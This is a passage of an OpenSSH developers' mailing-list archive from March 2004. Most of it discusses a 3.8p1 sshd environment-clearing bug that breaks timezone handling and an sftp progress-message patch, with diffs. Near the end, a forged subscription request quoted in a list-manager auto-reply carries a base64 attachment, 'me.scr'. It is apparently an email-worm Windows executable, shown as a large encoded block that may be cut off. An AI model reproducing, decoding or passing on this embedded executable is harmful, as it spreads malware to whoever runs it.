2004 From: rac at tenzing.org (Roger Cornelius) Date: Tue, 2 Mar 2004 16:29:33 -0500 Subject: environ problem in 3.8p1 Message-ID: <200403022129.i22LTW517908@tenzing.org> 3.8p1 added the following to main() in sshd.c: #ifndef HAVE_CYGWIN /* Clear environment */ environ[0] = NULL; #endif This breaks the getenv("TZ") in session.c and causes logins to occur in GMT time. It also causes any sshd syslog messages to be written in GMT time. I'm on SCO Openserver 5.0.7, but this looks like it should affect all platforms. Am I missing something? I haven't seen it reported before. Thanks. -- Roger Cornelius rac at tenzing.org From tim at multitalents.net Wed Mar 3 09:45:34 2004 From: tim at multitalents.net (Tim Rice) Date: Tue, 2 Mar 2004 14:45:34 -0800 (PST) Subject: environ problem in 3.8p1 In-Reply-To: <200403022129.i22LTW517908@tenzing.org> References: <200403022129.i22LTW517908@tenzing.org> Message-ID: On Tue, 2 Mar 2004, Roger Cornelius wrote: > > 3.8p1 added the following to main() in sshd.c: > > #ifndef HAVE_CYGWIN > /* Clear environment */ > environ[0] = NULL; > #endif > > This breaks the getenv("TZ") in session.c and causes logins to occur in > GMT time. It also causes any sshd syslog messages to be written in GMT > time. I'm on SCO Openserver 5.0.7, but this looks like it should affect > all platforms. Am I missing something? I haven't seen it reported > before. Perhaps it should be --- sshd.c.old 2004-02-29 15:36:01.351247001 -0800 +++ sshd.c 2004-03-02 14:41:32.551939053 -0800 @@ -1106,7 +1106,7 @@ unmounted if desired. */ chdir("/"); -#ifndef HAVE_CYGWIN +#ifndef DISABLE_FD_PASSING /* Clear environment */ environ[0] = NULL; #endif Wendy, are Crays having this problem? Can someone on DEC OSF check this? > > Thanks. > > -- Tim Rice Multitalents (707) 887-1469 tim at multitalents.net From djm at mindrot.org Wed Mar 3 11:11:37 2004 From: djm at mindrot.org (Damien Miller) Date: Wed, 03 Mar 2004 11:11:37 +1100 Subject: environ problem in 3.8p1 In-Reply-To: <200403022129.i22LTW517908@tenzing.org> References: <200403022129.i22LTW517908@tenzing.org> Message-ID: <404522B9.3010107@mindrot.org> Roger Cornelius wrote: > 3.8p1 added the following to main() in sshd.c: > > #ifndef HAVE_CYGWIN > /* Clear environment */ > environ[0] = NULL; > #endif > > This breaks the getenv("TZ") in session.c Good point - this probably needs to happen a fair bit later, in session.c. -d From djm at mindrot.org Wed Mar 3 12:01:02 2004 From: djm at mindrot.org (Damien Miller) Date: Wed, 03 Mar 2004 12:01:02 +1100 Subject: environ problem in 3.8p1 In-Reply-To: <404522B9.3010107@mindrot.org> References: <200403022129.i22LTW517908@tenzing.org> <404522B9.3010107@mindrot.org> Message-ID: <40452E4E.80205@mindrot.org> Damien Miller wrote: > Roger Cornelius wrote: > > >>3.8p1 added the following to main() in sshd.c: >> >>#ifndef HAVE_CYGWIN >> /* Clear environment */ >> environ[0] = NULL; >>#endif >> >>This breaks the getenv("TZ") in session.c > > > Good point - this probably needs to happen a fair bit later, in session.c. Actually, this won't work - KRB5CCNAME gets set during the auth process. Perhaps we just need to blank a couple of environment variables. Comments? -d From dtucker at zip.com.au Wed Mar 3 12:44:43 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Wed, 03 Mar 2004 12:44:43 +1100 Subject: environ problem in 3.8p1 In-Reply-To: <40452E4E.80205@mindrot.org> References: <200403022129.i22LTW517908@tenzing.org> <404522B9.3010107@mindrot.org> <40452E4E.80205@mindrot.org> Message-ID: <4045388B.4090804@zip.com.au> Damien Miller wrote: > Actually, this won't work - KRB5CCNAME gets set during the auth process. > > Perhaps we just need to blank a couple of environment variables. Comments? Yes, that seems safer. I had a patch somewhere that had configure check for unsetenv() and emulate it in openbsd-compat if not found (probably attached to the original bug #757). -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From tim at multitalents.net Wed Mar 3 13:34:05 2004 From: tim at multitalents.net (Tim Rice) Date: Tue, 2 Mar 2004 18:34:05 -0800 (PST) Subject: environ problem in 3.8p1 In-Reply-To: References: <200403022129.i22LTW517908@tenzing.org> Message-ID: On Tue, 2 Mar 2004, Tim Rice wrote: > On Tue, 2 Mar 2004, Roger Cornelius wrote: > > This breaks the getenv("TZ") in session.c and causes logins to occur in > > GMT time. It also causes any sshd syslog messages to be written in GMT > > time. I'm on SCO Openserver 5.0.7, but this looks like it should affect > > all platforms. Am I missing something? I haven't seen it reported > > before. I failed to mention that I can't duplicate the problem on UnixWare, but I can on OpenServer. > > Perhaps it should be > > -#ifndef HAVE_CYGWIN > +#ifndef DISABLE_FD_PASSING > /* Clear environment */ > environ[0] = NULL; > #endif > > Wendy, are Crays having this problem? > > Can someone on DEC OSF check this? -- Tim Rice Multitalents (707) 887-1469 tim at multitalents.net From djm at mindrot.org Wed Mar 3 14:13:25 2004 From: djm at mindrot.org (Damien Miller) Date: Wed, 3 Mar 2004 14:13:25 +1100 (EST) Subject: BUG: SFTP (openssh-3.8p1) upload doubles "Uploading..." comment In-Reply-To: <20040227214920.64F0F34863C@gateway.mailvault.com> References: <20040227214920.64F0F34863C@gateway.mailvault.com> Message-ID: On Fri, 27 Feb 2004, Job 317 wrote: > Sorry, wasn't sure how to describe this well in the Subject line... > > I am using OpenSSH-3.8p1 from a RedHat 7.3 to OpenSSH-3.8p1 on a RedHat > 9.0 box. While SFTP-ing using the 'put *' command in SFTP, I get > duplicate verbosity (?) in the terminal for each file uploaded... You have found a bug, thanks. Here is a patch: Index: sftp-client.c =================================================================== RCS file: /cvs/src/usr.bin/ssh/sftp-client.c,v retrieving revision 1.46 diff -u -r1.46 sftp-client.c --- sftp-client.c 17 Feb 2004 05:39:51 -0000 1.46 +++ sftp-client.c 3 Mar 2004 03:05:36 -0000 @@ -805,13 +805,8 @@ max_req = 1; progress_counter = 0; - if (showprogress) { - if (size) - start_progress_meter(remote_path, size, - &progress_counter); - else - printf("Fetching %s to %s\n", remote_path, local_path); - } + if (showprogress && size != 0) + start_progress_meter(remote_path, size, &progress_counter); while (num_req > 0 || max_req > 0) { char *data; @@ -1032,8 +1027,6 @@ offset = 0; if (showprogress) start_progress_meter(local_path, sb.st_size, &offset); - else - printf("Uploading %s to %s\n", local_path, remote_path); for (;;) { int len; From djm at mindrot.org Wed Mar 3 23:30:13 2004 From: djm at mindrot.org (Damien Miller) Date: Wed, 3 Mar 2004 23:30:13 +1100 (EST) Subject: BUG: SFTP (openssh-3.8p1) upload doubles "Uploading..." comment In-Reply-To: References: <20040227214920.64F0F34863C@gateway.mailvault.com> Message-ID: On Wed, 3 Mar 2004, Damien Miller wrote: > On Fri, 27 Feb 2004, Job 317 wrote: > > > Sorry, wasn't sure how to describe this well in the Subject line... > > > > I am using OpenSSH-3.8p1 from a RedHat 7.3 to OpenSSH-3.8p1 on a RedHat > > 9.0 box. While SFTP-ing using the 'put *' command in SFTP, I get > > duplicate verbosity (?) in the terminal for each file uploaded... > > You have found a bug, thanks. Fix has been committed, it will be in the next release. -d From arise-help at pry.com Thu Mar 4 10:35:40 2004 From: arise-help at pry.com (arise-help at pry.com) Date: Wed, 03 Mar 2004 23:35:40 -0000 Subject: confirm subscribe to arise@pry.com Message-ID: <1078356863.14335.ezmlm@pry.com> Hi! This is the ezmlm program. I'm managing the arise at pry.com mailing list. I'm working for my owner, who can be reached at arise-owner at pry.com. To confirm that you would like openssh-unix-dev at mindrot.org added to the arise mailing list, please send an empty reply to this address: arise-sc.1078356863.bdobopfgcnngnbelejpn-openssh-unix-dev=mindrot.org at pry.com Usually, this happens when you just hit the "reply" button. If this does not work, simply copy the address and paste it into the "To:" field of a new message. This confirmation serves two purposes. First, it verifies that I am able to get mail through to you. Second, it protects you in case someone forges a subscription request in your name. --- Administrative commands for the arise list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To subscribe to the list digest, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 14331 invoked by alias); 3 Mar 2004 23:34:23 -0000 Delivered-To: arise-subscribe at pry.com Received: (qmail 14327 invoked from network); 3 Mar 2004 23:34:18 -0000 Received: from unknown (HELO pry.com) (213.13.229.68) by 0 with SMTP; 3 Mar 2004 23:34:18 -0000 From: openssh-unix-dev at mindrot.org To: arise-subscribe at pry.com Subject: warning Date: Wed, 3 Mar 2004 20:36:47 -0300 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="34222687" --34222687 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit misc --34222687 Content-Type: application/octet-stream; name="me.scr" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="me.scr" 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 